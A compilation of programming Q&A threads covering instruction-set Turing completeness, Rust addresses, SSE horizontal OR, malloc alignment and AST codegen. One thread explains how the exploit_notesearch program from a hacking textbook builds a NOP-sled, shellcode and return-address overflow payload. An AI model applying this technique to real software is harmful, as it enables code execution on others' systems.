Is the following hypothetical instruction set Turing complete? - instruction-set

I have devised a hypothetical instruction set that I believe is Turing-complete. I cannot think of any computation that this instruction set is unable to perform. I would just like to verify that it is indeed Turing-complete.
Registers
IP = Instruction Pointer
FL = Flags
Memory
Von Neumann
Other Info
Instructions have two forms (the conditional/immediate jumps being the exceptions):
Acting on memory using a scalar
Acting on memory using other memory
All instructions act on unsigned integers of a fixed size
Each instruction consists of a one-byte opcode with three trailing one-byte arguments (not all arguments must be used).
Assume a byte is able to hold any memory address
Instructions
Moving = MOV
Basic Arithmetic = ADD, SUB, MUL, DIV, REM
Binary Logic = AND, NOT, OR, NOR, XOR, XNOR, NAND, SHR, SHL
Comparison = CMP (this instruction sets the flags (excluding the unsigned integer overflow flag) by comparing two values)
Conditional Jumps = JMP, various conditional jumps based on the flags
Flags
"Unsigned Integer Overflow"
">"
"<"
">="
"<="
"=/="
"="

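For concreteness, here is a minimal sketch in C of one possible encoding of this machine, assuming a 256-byte memory (a byte can hold any address), 4-byte instructions (one-byte opcode plus three one-byte arguments), and hypothetical opcode numbers. It runs a counted loop with CMP plus a conditional jump, the kind of control flow that Turing-completeness arguments hinge on:

#include <stdint.h>
#include <stdio.h>

enum { MOVI, ADDI, CMPM, JNE, HALT };  /* hypothetical opcode numbers */

uint8_t mem[256];                      /* a byte can hold any address */
uint8_t ip = 0;                        /* IP register */
uint8_t fl_ne = 0;                     /* the "=/=" flag */

void run(void) {
    for (;;) {
        uint8_t op = mem[ip], a = mem[ip + 1], b = mem[ip + 2];
        ip += 4;                       /* one-byte opcode + three argument bytes */
        switch (op) {
        case MOVI: mem[a] = b;                 break;  /* mem[a] = immediate b  */
        case ADDI: mem[a] += b;                break;  /* mem[a] += immediate b */
        case CMPM: fl_ne = (mem[a] != mem[b]); break;  /* CMP sets the "=/=" flag */
        case JNE:  if (fl_ne) ip = a;          break;  /* conditional jump */
        case HALT: return;
        }
    }
}

int main(void) {
    uint8_t prog[] = {                 /* Von Neumann: program shares memory with data */
        MOVI, 100, 0, 0,               /*  0: counter (mem[100]) = 0    */
        MOVI, 101, 5, 0,               /*  4: limit   (mem[101]) = 5    */
        ADDI, 100, 1, 0,               /*  8: counter += 1              */
        CMPM, 100, 101, 0,             /* 12: flag = (counter != limit) */
        JNE,  8, 0, 0,                 /* 16: loop back while unequal   */
        HALT, 0, 0, 0,                 /* 20: done                      */
    };
    for (unsigned i = 0; i < sizeof prog; i++) mem[i] = prog[i];
    run();
    printf("counter = %d\n", mem[100]);  /* prints: counter = 5 */
    return 0;
}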
Related

Why are printed memory addresses in Rust a mix of both 40-bit and 48-bit addresses?

I'm trying to understand the way Rust deals with memory and I've a little program that prints some memory addresses:
fn main() {
    let a = &&&5;
    let x = 1;
    println!(" {:p}", &x);
    println!(" {:p} \n {:p} \n {:p} \n {:p}", &&&a, &&a, &a, a);
}
This prints the following (varies for different runs):
0x235d0ff61c
0x235d0ff710
0x235d0ff728
0x235d0ff610
0x7ff793f4c310
This is actually a mix of both 40-bit and 48-bit addresses. Why this mix? Also, can somebody please tell me why addresses 2, 3, and 4 are not separated by 8 bytes (since std::mem::size_of_val(&a) gives 8)? I'm running Windows 10 on an AMD x64 processor (Phenom II X4) with 24 GB RAM.
All the addresses do have the same size; Rust is just not printing leading zero digits.
The actual memory layout is an implementation detail of your OS, but the reason that a prints a location in a different memory area than all the other variables is that a actually lives in your loaded binary: it is a value that the compiler can already compute. All the other variables are computed at runtime and live on the stack.
See the compilation result on https://godbolt.org/z/kzSrDr:
.L__unnamed_4 contains the value 5; .L__unnamed_5, .L__unnamed_6 and .L__unnamed_1 are &5, &&5 and &&&5.
So .L__unnamed_1 is what is at 0x7ff793f4c310 on your system, while the 0x235d0ff??? addresses are on your stack, computed in the red and blue areas of the code.
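The same split can be demonstrated in C (a minimal sketch; the exact address ranges are an implementation detail of the OS): a compile-time constant lives in the loaded binary, while locals live on the stack.

#include <stdio.h>

static const int in_binary = 5;   /* lives in the loaded binary (read-only data) */

int main(void) {
    int on_stack = 1;             /* lives on the stack */
    printf("%p  (binary)\n", (const void *)&in_binary);
    printf("%p  (stack)\n",  (void *)&on_stack);
    return 0;
}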
This is actually a mix of both 40-bit and 48-bit addresses. Why this mix?
It's not really a mix, Rust just doesn't display leading zeroes. It's really about where the OS maps the various components of the program (data, bss, heap and stack) in the address space.
Also, can somebody please tell me why the addresses (2, 3, 4) do not fall in locations separated by 8-bytes (since std::mem::size_of_val(&a) gives 8)?
Because println! is a macro which expands to a bunch of stuff in the stack frame, your values are not laid out next to one another in the final code (https://play.rust-lang.org/?version=stable&mode=debug&edition=2018&gist=5b812bf11e51461285f51f95dd79236b). Though even if they were, there'd be no guarantee the compiler wasn't e.g. reusing now-dead memory to save on frame size.

Check that at least 1 element is true in each of multiple vectors of compare results - horizontal OR then AND

I'm looking for an SSE Bitwise OR between components of same vector. (Editor's note: this is potentially an X-Y problem, see below for the real comparison logic.)
I am porting some SIMD logic from SPU intrinsics. It has an instruction
spu_orx(a)
Which according to the docs
spu_orx: OR word across. d = spu_orx(a). The four word elements of vector a are logically ORed. The result is returned in word element 0 of vector d. All other elements (1, 2, 3) of d are assigned a value of zero.
How can I do that with SSE2 - SSE4, using as few instructions as possible? _mm_or_ps is what I have so far.
UPDATE:
Here is the scenario from SPU based code:
qword res = spu_orx(spu_or(spu_fcgt(x, y), spu_fcgt(z, w)))
So it first ORs two 'greater-than' comparisons, then horizontally ORs the result.
Later, pairs of those results are ANDed to get the final comparison value.
This is effectively doing (A||B||C||D||E||F||G||H) && (I||J||K||L||M||N||O||P) && ... where A..D are the 4x 32-bit elements of the fcgt(x,y) and so on.
Obviously vertical _mm_or_ps of _mm_cmp_ps results is a good way to reduce down to 1 vector, but then what? Shuffle + OR, or something else?
UPDATE 1
Regarding "but then what?"
I perform
qword res = spu_orx(spu_or(spu_fcgt(x, y), spu_fcgt(z, w)))
On SPU it goes like this:
qword aRes  = si_and(res, res1);
qword aRes1 = si_and(aRes, res2);
qword aRes2 = si_and(aRes1, res3);
return si_to_uint(aRes2);
several times on different inputs, then AND those all into a single result, which is finally cast to an integer 0 or 1 (a false/true test).
SSE4.1 PTEST
bool any_nonzero = !_mm_testz_si128(v,v);
That would be a good way to horizontal OR + booleanize a vector into a 0/1 integer. It will compile to multiple instructions, and ptest same,same is 2 uops on its own. But once you have the result as a scalar integer, scalar AND is even cheaper than any vector instruction, and you can branch on the result directly because it sets integer flags.
#include <immintrin.h>
bool any_nonzero_bit(__m128i v) {
    return !_mm_testz_si128(v,v);
}
On Godbolt with gcc9.1 -O3 -march=nehalem:
any_nonzero(long long __vector(2)):
    ptest   xmm0, xmm0          # 2 uops
    setne   al                  # 1 uop with false dep on old value of RAX
    ret
This is only 3 uops on Intel for a horizontal OR into a single bit in an integer register. AMD Ryzen ptest is only 1 uop so it's even better.
The only risk here is if gcc or clang creates false dependencies by not xor-zeroing eax before doing a setcc into AL. Usually gcc is pretty fanatical about spending extra uops to break false dependencies so I don't know why it doesn't here. (I did check with -march=skylake and -mtune=generic in case it was relying on Nehalem partial-register renaming for -march=nehalem. Even -march=znver1 didn't get it to xor-zero EAX before the ptest.)
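Tying this to the comparison logic from the question (a sketch; both_groups is a hypothetical name, and the final scalar && is exactly the cheap integer AND described above):

#include <immintrin.h>
#include <stdbool.h>

static inline bool any_nonzero_bit(__m128i v) {
    return !_mm_testz_si128(v, v);   /* SSE4.1 PTEST + SETcc */
}

/* (a>b || c>d) && (e>f || g>h), per-element ORs reduced per group */
bool both_groups(__m128 a, __m128 b, __m128 c, __m128 d,
                 __m128 e, __m128 f, __m128 g, __m128 h) {
    __m128 g1 = _mm_or_ps(_mm_cmpgt_ps(a, b), _mm_cmpgt_ps(c, d));
    __m128 g2 = _mm_or_ps(_mm_cmpgt_ps(e, f), _mm_cmpgt_ps(g, h));
    return any_nonzero_bit(_mm_castps_si128(g1))
        && any_nonzero_bit(_mm_castps_si128(g2));
}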
It would be nice if we could avoid the _mm_or_ps and have PTEST do all the work. But even if we consider inverting the comparisons, the vertical-AND / horizontal-OR behaviour doesn't let us check something about all 8 elements of 2 vectors, or about any of those 8 elements.
e.g. Can PTEST be used to test if two registers are both zero or some other condition?
// NOT USEFUL
// 1 if all the vertical pairs AND to zero.
// but 0 if even one vertical AND result is non-zero
_mm_testz_si128( _mm_castps_si128(_mm_cmpngt_ps(x,y)),
                 _mm_castps_si128(_mm_cmpngt_ps(z,w)));
I mention this only to rule it out and save you the trouble of considering this optimization idea. (#chtz suggested it in comments. Inverting the comparison is a good idea that can be useful for other ways of doing things.)
Without SSE4.1 / delaying the horizontal OR
We might be able to delay horizontal ORing / booleanizing until after combining some results from multiple vectors. This makes combining more expensive (imul or something), but saves 2 uops in the vector -> integer stage vs. PTEST.
x86 has cheap vector mask->integer bitmap with _mm_movemask_ps. Especially if you ultimately want to branch on the result, this might be a good idea. (But x86 doesn't have a || instruction that booleanizes its inputs either so you can't just & the movemask results).
One thing you can do is integer-multiply the movemask results: x * y is non-zero iff both inputs are non-zero, unlike x & y, which can be false (e.g. 0b0101 & 0b1010). (Our inputs are 4-bit movemask results and unsigned is 32-bit, so we have some room before we overflow.) AMD Bulldozer family has an integer multiply that isn't fully pipelined, so this could be a bottleneck on old AMD CPUs. Using just 32-bit integers is also good for some low-power CPUs with slow 64-bit multiply.
This might be good if throughput is more of a bottleneck than latency, although movmskps can only run on one port.
I'm not sure if there are any cheaper integer operations that let us recover the logical-AND result later. Adding doesn't work; the result is non-zero even if only one of the inputs was non-zero. Concatenating the bits together (shift+or) is also of course like an OR if we eventually just test for any non-zero bit. We can't just bitwise AND because 2 & 1 == 0, unlike 2 && 1.
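A sketch of that multiply trick (both_any is a hypothetical helper name):

#include <immintrin.h>

/* non-zero iff each compare-result vector has at least one set element;
   ma * mb works where ma & mb would not (e.g. 0b0101 & 0b1010 == 0) */
static inline unsigned both_any(__m128 cmp_a, __m128 cmp_b) {
    unsigned ma = (unsigned)_mm_movemask_ps(cmp_a);  /* 4-bit bitmap */
    unsigned mb = (unsigned)_mm_movemask_ps(cmp_b);  /* 4-bit bitmap */
    return ma * mb;   /* booleanize or branch on this later */
}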
Keeping it in the vector domain
Horizontal OR of 4 elements takes multiple steps.
The obvious way is _mm_movehl_ps + OR, then another shuffle+OR. (See Fastest way to do horizontal float vector sum on x86 but replace _mm_add_ps with _mm_or_ps)
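That looks something like this (a sketch; treating a non-zero low element as "true" assumes compare-result inputs of 0 / -1):

#include <immintrin.h>

/* horizontal OR of 4 float-compare elements: reduce 4 -> 2 -> 1 */
static inline int any_set(__m128 v) {
    __m128 hi  = _mm_movehl_ps(v, v);                /* elements 2,3 -> 0,1 */
    __m128 or2 = _mm_or_ps(v, hi);                   /* two candidates left */
    __m128 lo1 = _mm_shuffle_ps(or2, or2, _MM_SHUFFLE(1, 1, 1, 1));
    __m128 or1 = _mm_or_ps(or2, lo1);                /* element 0 = OR of all 4 */
    return _mm_cvtsi128_si32(_mm_castps_si128(or1)); /* non-zero if any set */
}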
But since we don't actually need an exact bitwise-OR when our inputs are compare results, we just care if any element is non-zero. We can and should think of the vectors as integer, and look at integer instructions like 64-bit element ==. One 64-bit element covers/aliases two 32-bit elements.
__m128i cmp = _mm_castps_si128(cmpps_result);        // reinterpret: zero instructions
// SSE4.1 pcmpeqq: 64-bit integer elements
__m128i cmp64 = _mm_cmpeq_epi64(cmp, _mm_setzero_si128());  // -1 if both 32-bit halves of a qword were zero, otherwise 0
__m128i swap  = _mm_shuffle_epi32(cmp64, _MM_SHUFFLE(1,0, 3,2));  // copy and swap; no movdqa instruction needed even without AVX
__m128i bothzero = _mm_and_si128(cmp64, swap);       // both halves have the full result
After this logical inversion, ORing together multiple bothzero results will give you the AND of multiple conditions you're looking for.
Alternatively, SSE4.1 _mm_minpos_epu16(cmp64) (phminposuw) will tell us in 1 uop (but 5 cycle latency) if either qword is zero. It will place either 0 or 0xFFFF in the lowest word (16 bits) of the result in this case.
If we inverted the original compares, we could use phminposuw on that (without pcmpeqq) to check if any are zero. So basically a horizontal AND across the whole vector. (Assuming that it's elements of 0 / -1). I think that's a useful result for inverted inputs. (And saves us from using _mm_xor_si128 to flip the bits).
An alternative to pcmpeqq (_mm_cmpeq_epi64) would be SSE2 psadbw against a zeroed vector to get 0 or non-zero results in the bottom of each 64-bit element. It won't be a mask, though, it's 0xFF * 8. Still, it's always that or 0 so you can still AND it. And it doesn't invert.
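A sketch of that psadbw alternative:

#include <immintrin.h>

/* SSE2: sum of absolute byte differences against zero leaves 0 or a
   non-zero multiple of 0xFF in the low 16 bits of each 64-bit half;
   not a mask, but still testable and AND-able */
static inline __m128i nonzero_per_qword(__m128i cmp) {
    return _mm_sad_epu8(cmp, _mm_setzero_si128());
}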

Why is the allocated memory different from the size of the string?

Please consider the following code:
char **str;
str = malloc(sizeof(char *) * 3); // Allocates enough memory for 3 char pointers
str[0] = malloc(sizeof(char) * 24);
str[1] = malloc(sizeof(char) * 25);
str[2] = malloc(sizeof(char) * 25);
When I use printf to print the memory addresses held by each pointer:
printf("str[0] = '%p'\nstr[1] = '%p'\nstr[2] = '%p'\n", str[0], str[1], str[2]);
I get this output:
str[0] = '0x1254030'
str[1] = '0x1254050'
str[2] = '0x1254080'
I expected the number corresponding to the second address to be the sum of the number corresponding to the first one and 24, which is the size of the string str[0] in bytes (since a char has a size of 1 byte). That is, I expected the second address to be 0x1254048, considering that these numbers are expressed in base 16 (0123456789abcdef).
It seems to me that I spotted a pattern: starting from 24 characters in a string, for every 16 more characters it contains, the memory used is 16 bytes larger. For example, a 45-character string uses 64 bytes of memory, a 77-character string uses 80 bytes, and a 150-character string uses 160 bytes.
I would like to understand why the memory allocated isn't equal to the size of the string. Why does it follow this pattern?
There are at least two reasons malloc() may return memory in the manner you've noted.
Efficiency and performance. By returning blocks of memory in only a small set of actual sizes, a request for memory is much more likely to find an already-existing block that can be used, or to wind up producing a block that can be easily reused in the future. This makes the request return faster and has the side effect of limiting memory fragmentation.
Implications arising from the memory alignment requirements. Section 7.22.3 Memory management functions of the C Standard states: "The order and contiguity of storage allocated by successive calls to the aligned_alloc, calloc, malloc, and realloc functions is unspecified. The pointer returned if the allocation succeeds is suitably aligned so that it may be assigned to a pointer to any type of object with a fundamental alignment requirement ..." Note the part about being suitably aligned. Since the malloc() implementation has no knowledge of what the memory is to be used for, the memory returned has to be suitably aligned for any possible use. This usually means 8- or 16-byte alignment, depending on the platform.
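A quick way to see that requirement on your own platform (a sketch, C11):

#include <stdio.h>
#include <stdalign.h>
#include <stddef.h>

int main(void) {
    /* malloc must return memory aligned for any fundamental type;
       on typical x86-64 platforms this prints 16 */
    printf("alignof(max_align_t) = %zu\n", alignof(max_align_t));
    return 0;
}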
Three reasons:
(1) The string "ABC" contains 4 characters, because every string in C has to have a terminating '\0'.
(2) Many processors have memory address alignment issues that make it most efficient when any block allocated by malloc() starts on an address that is a multiple of 4, or 8, or whatever the "natural" memory size is.
(3) The malloc() function itself requires some memory to store information about what has been allocated where, so that free() knows what to do.
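A small experiment that makes both effects visible (a sketch; the spacing you observe is allocator-dependent and not guaranteed by the standard):

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(void) {
    for (size_t n = 24; n <= 27; n++) {
        char *p = malloc(n);
        char *q = malloc(n);
        /* the spacing between consecutive blocks exposes the size class */
        printf("n=%zu  spacing=%ju\n", n,
               (uintmax_t)((uintptr_t)q - (uintptr_t)p));
        free(p);
        free(q);
    }
    return 0;
}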

The art of exploitation - exploit_notesearch.c

I've got a question regarding the exploit_notesearch program.
This program is only used to create a command string that we finally pass to the system() function in order to exploit the notesearch program, which contains a buffer overflow vulnerability. The command string looks like this:
./notesearch [NOP block][shellcode][repeated ret (which will jump into the NOP block)]
Now the actual question:
The ret address is calculated in the exploit_notesearch program by the line:
ret = (unsigned int) &i - offset;
So why can we use the address of the i variable, which is near the bottom of the main stack frame of the exploit_notesearch program, to calculate the ret address that will be stored in the overflowed buffer of the notesearch program itself, i.e. in a completely different stack frame, where it has to point into the NOP block (which is in the same buffer)?
that will be stored in the overflowed buffer of the notesearch program itself, i.e. in a completely different stack frame
As long as the system uses virtual memory, system() will create another process for the vulnerable program, and assuming there is no stack randomization, both processes will have almost identical values of esp (and hence of the offset) when their main() functions start, given that the exploit was compiled on the attacked machine (i.e. with the vulnerable notesearch).
The address of variable i was chosen just to give an idea about where the frame base is. We could use this instead:
unsigned long sp(void)              // This is just a little function
{ __asm__("movl %esp, %eax"); }     // used to return the stack pointer

int main() {
    esp = sp();
    ret = esp - offset;
    // the rest of main()
}
Because the variable i is located at a relatively constant distance from esp, we can use &i instead of esp; it doesn't matter much.
It would be much more difficult to get an approximate value for ret if the system did not use virtual memory.
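For reference, a simplified reconstruction of how exploit_notesearch uses that computed ret (from memory of the book's code, with the shellcode bytes elided and 32-bit pointers assumed, as in the book):

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char shellcode[] = "...";                     /* the book's shellcode bytes, elided */

int main(int argc, char *argv[]) {
    unsigned int i, ret, offset = 270;        /* the book's default offset */
    char command[200] = "./notesearch \'";
    char *buffer = command + strlen(command);

    if (argc > 1)
        offset = atoi(argv[1]);               /* let the attacker tune the guess */
    ret = (unsigned int)&i - offset;          /* guess based on our own frame */

    for (i = 0; i < 160; i += 4)
        *(unsigned int *)(buffer + i) = ret;  /* repeat ret across the buffer */
    memset(buffer, 0x90, 60);                 /* NOP sled at the front */
    memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);
    strcat(command, "\'");

    system(command);                          /* run the vulnerable program */
    return 0;
}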
The stack works in a first-in, last-out fashion. The i variable is located somewhere near the top; let's assume it is at 0x200, while the return address is located at the lower address 0x180. To determine where to put the return address, while still leaving some space for the shellcode, the attacker takes the difference: 0x200 - 0x180 = 0x80 (128 bytes). The return address itself is 4 bytes, so only about 48 bytes are left before reaching a segmentation fault. That is how it is calculated; the location of i gives an approximate reference point.

compilers - Instruction Selection for type declarations in AST

I'm learning compilers and creating a code generator for a simple language that deals with two types: characters and integers.
After the user input has been scanned by the scanner and then parsed by the parser, I get an AST representation of the input. I have already written a code generator for an even simpler language that only processes expressions with integers, operators and variables.
However with this new language I sometimes get a subtree for a type declaration, like this:
(IS TYPE (x) (INT))
which says x is of type INT.
Should there be a case in my code generator which deals with these type declarations? Or is this simply for the semantic analyzer to type check, so I should just assume the types have been checked and ignore this part of the tree and simply assign the value for x?
Both situations are possible. You need to describe more about your language to see whether you really need to add that feature to your code generator, or can skip it as unnecessary and avoid extra work in this difficult and interesting topic of designing a programming language.
Is your "code generator" a program that receives as input code in one (maybe small) programming language and outputs code in another (maybe small) programming language?
This tool is usually called a "translator".
Is your "code generator" a program that receives a programming language as input and outputs an assembler- or bytecode-like language?
This tool is usually called a "compiler".
Usually an A.S.T. stores the type of an operation or function call. For example, in C:
...
int a = 3;
int b = 5;
float c = (float)(a * b);
...
The last line generates an A.S.T. similar to this (skipping the A.S.T. for the other lines):
                    +--------------+
                    |    [root]    |
                    | (no type) =  |
                    +------+-------+
                           |
            +--------------+---------------+
            |                              |
     +------+------+        +--------------+--------------+
     |  (float) c  |        |  (float) (cast operation)   |
     +-------------+        +--------------+--------------+
                                           |
                                    +------+------+
                                    |  (int) ()   |
                                    +------+------+
                                           |
                                    +------+------+
                                    |   (int) *   |
                                    +------+------+
                                           |
                             +-------------+-------------+
                             |                           |
                      +------+------+             +------+------+
                      |   (int) a   |             |   (int) b   |
                      +-------------+             +-------------+
Note that the "(float)" cast acts like an operator or a function, similar to your question.
Good Luck.
If this is a declaration
(IS TYPE (x) (INT))
then x should be laid out in memory. In the case of C, local auto variables are allocated on the stack; to allocate the needed stack size, you should know the sizes of all local variables, and those sizes come from their types.
If the variable is instead stored in a register, you should select a register of the needed size (think of x86, where AL, AX, EAX and RAX are the same register at different sizes), if your target has such registers.
Also, the type is needed when there is an ambiguous operation in the AST that can operate on different data sizes (e.g. char, short, int, i.e. 8-bit, 16-bit, 32-bit, etc.). In some assemblers the size of the data is encoded into the instruction itself, so the code generator has to remember the sizes of variables.
Or, if the type of the operation was not recorded in the AST, the ADD in:
(ADD (x) (y))
may mean either float or int addition (FADD or ADD instructions), so the types of x and y are needed in codegen to select the right variant.
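A minimal sketch of that last point (hypothetical node and field names), where the type recorded by the semantic analyzer drives the instruction selection:

#include <stdio.h>

typedef enum { TY_INT, TY_FLOAT } Type;
typedef enum { KIND_VAR, KIND_ADD } Kind;

typedef struct Node {
    Kind kind;
    Type type;                 /* filled in by the semantic analyzer */
    const char *name;          /* for KIND_VAR */
    struct Node *lhs, *rhs;    /* for KIND_ADD */
} Node;

static void gen(Node *n) {
    if (n->kind == KIND_VAR) {
        printf("  push %s\n", n->name);   /* load the operand */
    } else {                              /* KIND_ADD */
        gen(n->lhs);
        gen(n->rhs);
        /* instruction selection driven by the checked type */
        printf("  %s\n", n->type == TY_FLOAT ? "fadd" : "add");
    }
}

int main(void) {
    Node x   = { KIND_VAR, TY_INT, "x", 0, 0 };
    Node y   = { KIND_VAR, TY_INT, "y", 0, 0 };
    Node add = { KIND_ADD, TY_INT, 0, &x, &y };
    gen(&add);                            /* emits push x / push y / add */
    return 0;
}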
